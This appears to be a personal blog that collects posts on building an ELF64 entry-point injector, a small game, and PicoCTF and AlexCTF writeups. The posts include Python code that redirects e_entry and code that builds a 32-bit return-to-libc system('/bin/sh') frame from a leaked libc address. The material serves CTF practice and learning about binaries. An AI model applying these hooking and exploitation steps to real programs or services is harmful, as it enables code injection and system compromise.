In Your Elf

I made a fun tool in order to learn a bit more about Linux ELF64 headers. It will run an exported function from a shared library before running the original main function.

Right now, it requires the target code to use dlopen and dlsym, so we can steal those references. We also do not support PIE binaries. To fix this, in the future I would not require dlopen and dlsym, but implement my own pseudo-linker.
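To make the header fields the tool has to touch concrete, here is an added example (not the tool's own code, and not from the 0x00sec post): a small ELF64 walker that decodes the ELF header and program headers, maps e_entry back to a file offset through the PT_LOAD segment that covers it, and rewrites e_entry to redirect the entry point, refusing ET_DYN (PIE) binaries for the same reason the tool does. The ELF image it operates on is constructed inline, so it runs without a real binary; struct layouts follow the Elf64_Ehdr and Elf64_Phdr definitions.

```python
"""
ELF64 header walker, illustrating the pieces an entry-point injector has to
read and rewrite: e_entry, e_type (ET_EXEC vs ET_DYN, i.e. PIE), and the
PT_LOAD segment that maps the entry point into the file.
"""
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS64, ELFDATA2LSB = 2, 1
ET_EXEC, ET_DYN = 2, 3
PT_LOAD = 1
EM_X86_64 = 0x3E

EHDR_FMT = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr, little-endian, 64 bytes
PHDR_FMT = "<IIQQQQQQ"           # Elf64_Phdr, 56 bytes
EHDR_SIZE = struct.calcsize(EHDR_FMT)
PHDR_SIZE = struct.calcsize(PHDR_FMT)
E_ENTRY_OFFSET = 24              # byte offset of e_entry inside Elf64_Ehdr

EHDR_FIELDS = ("e_ident", "e_type", "e_machine", "e_version", "e_entry",
               "e_phoff", "e_shoff", "e_flags", "e_ehsize", "e_phentsize",
               "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")
PHDR_FIELDS = ("p_type", "p_flags", "p_offset", "p_vaddr", "p_paddr",
               "p_filesz", "p_memsz", "p_align")


def parse_ehdr(data):
    """Decode the ELF header, refusing anything that is not little-endian ELF64."""
    if len(data) < EHDR_SIZE or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ehdr = dict(zip(EHDR_FIELDS, struct.unpack_from(EHDR_FMT, data, 0)))
    ident = ehdr["e_ident"]
    if ident[4] != ELFCLASS64 or ident[5] != ELFDATA2LSB:
        raise ValueError("only little-endian ELF64 is handled here")
    return ehdr


def parse_phdrs(data, ehdr):
    """Decode the program header table the loader uses to map segments."""
    phdrs = []
    for i in range(ehdr["e_phnum"]):
        off = ehdr["e_phoff"] + i * ehdr["e_phentsize"]
        phdrs.append(dict(zip(PHDR_FIELDS, struct.unpack_from(PHDR_FMT, data, off))))
    return phdrs


def is_pie(ehdr):
    """A PIE executable is ET_DYN: every address in it is relative to a load base."""
    return ehdr["e_type"] == ET_DYN


def entry_file_offset(data):
    """Map e_entry back to a file offset through the PT_LOAD segment that holds it."""
    ehdr = parse_ehdr(data)
    for ph in parse_phdrs(data, ehdr):
        lo, hi = ph["p_vaddr"], ph["p_vaddr"] + ph["p_filesz"]
        if ph["p_type"] == PT_LOAD and lo <= ehdr["e_entry"] < hi:
            return ph["p_offset"] + (ehdr["e_entry"] - ph["p_vaddr"])
    raise ValueError("e_entry is not backed by any PT_LOAD segment")


def set_entry(data, new_entry):
    """Return a copy with e_entry redirected, the injector's hook step.

    Mirrors the post's limitation: PIE binaries are refused, because an ET_DYN
    e_entry is base-relative and any absolute address a stub hard-codes
    (for example the stolen dlopen/dlsym references) would be wrong after
    relocation.
    """
    ehdr = parse_ehdr(data)
    if is_pie(ehdr):
        raise ValueError("PIE binary (ET_DYN) is not supported")
    out = bytearray(data)
    struct.pack_into("<Q", out, E_ENTRY_OFFSET, new_entry)
    return bytes(out)


def build_sample(pie=False):
    """Constructed ELF64 image (not a real binary): one PT_LOAD, entry at base+0x500."""
    base = 0 if pie else 0x400000
    ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0, 0]) + b"\0" * 7
    ehdr = struct.pack(EHDR_FMT, ident, ET_DYN if pie else ET_EXEC, EM_X86_64, 1,
                       base + 0x500, EHDR_SIZE, 0, 0, EHDR_SIZE, PHDR_SIZE, 1,
                       64, 0, 0)
    phdr = struct.pack(PHDR_FMT, PT_LOAD, 5, 0, base, base, 0x1000, 0x1000, 0x1000)
    image = ehdr + phdr
    return image + b"\xcc" * (0x1000 - len(image))  # int3 filler stands in for code


if __name__ == "__main__":
    sample = build_sample()
    print("entry 0x%x at file offset 0x%x" % (parse_ehdr(sample)["e_entry"],
                                               entry_file_offset(sample)))
    hooked = set_entry(sample, 0x400800)
    print("hooked entry -> file offset 0x%x" % entry_file_offset(hooked))
```

Run it against a real non-PIE binary by replacing `build_sample()` with the file's bytes; `entry_file_offset` is where a stub that calls into the shared library and then jumps to the original entry would have to be written, which is the part this walker deliberately leaves out.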

Either way, it was a great way to learn more about executables on Linux. I was inspired by the post on 0x00sec by pico (https://0x00sec.org/t/elfun-file-injector/410).

Sorry about this one

I made a small game for this month’s project. It isn’t much to look at.

It was fun getting more comfortable with blender, and actually finishing a (very) small game. Hopefully more of this in the future!

Sorry the game is a bit tasteless. When I was a middle schooler, I played a flash game with a similar concept, and I thought it was the funniest idea in the world.

PicoCTF : Enter The Matrix WriteUp

PicoCTF is a CTF “targeted at middle and high school students,” but I have always found them to be fun practice. This year (2017) especially, I thought the Binary Exploitation challenges were entertaining. This writeup will be about “Enter The Matrix,” in level 3.
The challenge description is:

The Matrix awaits you. Take the red pill and begin your journey. Source. Jack in at shell2017.picoctf.com:19369.

This was a good challenge, involving a heap overflow and a return-to-libc attack. I implemented my exploit in golang, and you can see my source code at the bottom of this post.

Hints

If you are working on this problem, I will start with a few hints that don’t give everything away.

  1. Try playing with different non-symmetrical matrices.
  2. You can ssh into the machine that is running the challenge.
  3. gdb will give you libc offsets that are incorrect outside of gdb.
  4. On that machine you can use “readelf -s /lib32/libc.so.6” to get function offsets for anything you need.
  5. Free is passed a pointer to data you control.
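Hints 3 and 4 come down to one calculation: take symbol offsets from the challenge box's own libc, add them to a base recovered from a single leaked pointer, and sanity-check the result. The following is an added example (not the writeup's Go exploit) that parses constructed `readelf -s` lines, recovers the libc base from an assumed leaked puts address, and packs the 32-bit return-to-libc frame `[system][exit][&"/bin/sh"]`. The symbol offsets, the leaked address and the "/bin/sh" address are all assumed values for illustration, not the real ones from shell2017.picoctf.com.

```python
"""
Turn `readelf -s libc.so.6` offsets plus one leaked libc pointer into the
absolute addresses a 32-bit return-to-libc frame needs.
"""
import re
import struct

# Constructed sample of `readelf -s /lib32/libc.so.6` output. The offsets are
# made up for illustration; take the real ones from the challenge machine,
# not from a libc on your own box and not from inside gdb.
SAMPLE_READELF = """\
Symbol table '.dynsym' contains 3 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
   100: 0003a940    55 FUNC    GLOBAL DEFAULT   13 system@@GLIBC_2.0
   101: 000d4a30   120 FUNC    WEAK   DEFAULT   13 puts@@GLIBC_2.0
   102: 0002e7b0    33 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
"""

# Columns: Num: Value Size Type Bind Vis Ndx Name
SYM_RE = re.compile(
    r"^\s*\d+:\s+([0-9a-fA-F]+)\s+\d+\s+(\w+)\s+\w+\s+\w+\s+\S+\s+(\S+)")


def parse_readelf_symbols(text):
    """Map bare symbol names to libc-relative offsets, dropping @@VERSION suffixes."""
    offsets = {}
    for line in text.splitlines():
        m = SYM_RE.match(line)
        if not m:
            continue
        value, sym_type, name = m.groups()
        name = name.split("@", 1)[0]
        if sym_type == "FUNC" and name not in offsets:
            offsets[name] = int(value, 16)
    return offsets


def libc_base_from_leak(leaked_addr, symbol, offsets, page=0x1000):
    """base = leak - offset. libc is mapped page-aligned, so a base that is not
    a multiple of the page size means the offsets do not belong to the libc
    the target is actually running (hint 3)."""
    base = leaked_addr - offsets[symbol]
    if base % page:
        raise ValueError("libc base 0x%x is not page-aligned; check offsets" % base)
    return base


def ret2libc_frame(leaked_puts, binsh_addr, offsets):
    """Build [system][exit][&"/bin/sh"]: the 32-bit cdecl frame written over a
    saved return address. system() returns into exit() so the process ends
    cleanly once the shell closes instead of crashing."""
    base = libc_base_from_leak(leaked_puts, "puts", offsets)
    system = base + offsets["system"]
    exit_ = base + offsets["exit"]
    return struct.pack("<III", system, exit_, binsh_addr)


if __name__ == "__main__":
    offs = parse_readelf_symbols(SAMPLE_READELF)
    leaked_puts, binsh = 0xF7D4AA30, 0x0804A100   # assumed leak and string address
    print("libc base 0x%x" % libc_base_from_leak(leaked_puts, "puts", offs))
    print(ret2libc_frame(leaked_puts, binsh, offs).hex())
```

The page-alignment check is the cheap way to catch the mistake behind hint 3: if the base comes out misaligned, the offsets and the leak do not refer to the same libc.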


AlexCTF : Catalyst System WriteUp

This year we got a group together to do AlexCTF. Almost all of the problems were fun, and overall I enjoyed the event.
Of the initial challenges released Friday, I had the most fun with Reverse Engineering 3, the Catalyst System challenge.

A quick aside about the two tools I used for this challenge: Radare2 and Z3. Radare2 is my favorite binary analysis and debugging tool. There is a bit of a learning curve, but it is powerful and open source! (Also, I love that no one knows how to pronounce Radare, so you get all sorts of fun interpretations.) If you are still using gdb, I highly recommend taking the time to get to know it. Z3 is a high-performance theorem prover (it does the math I can't be bothered with).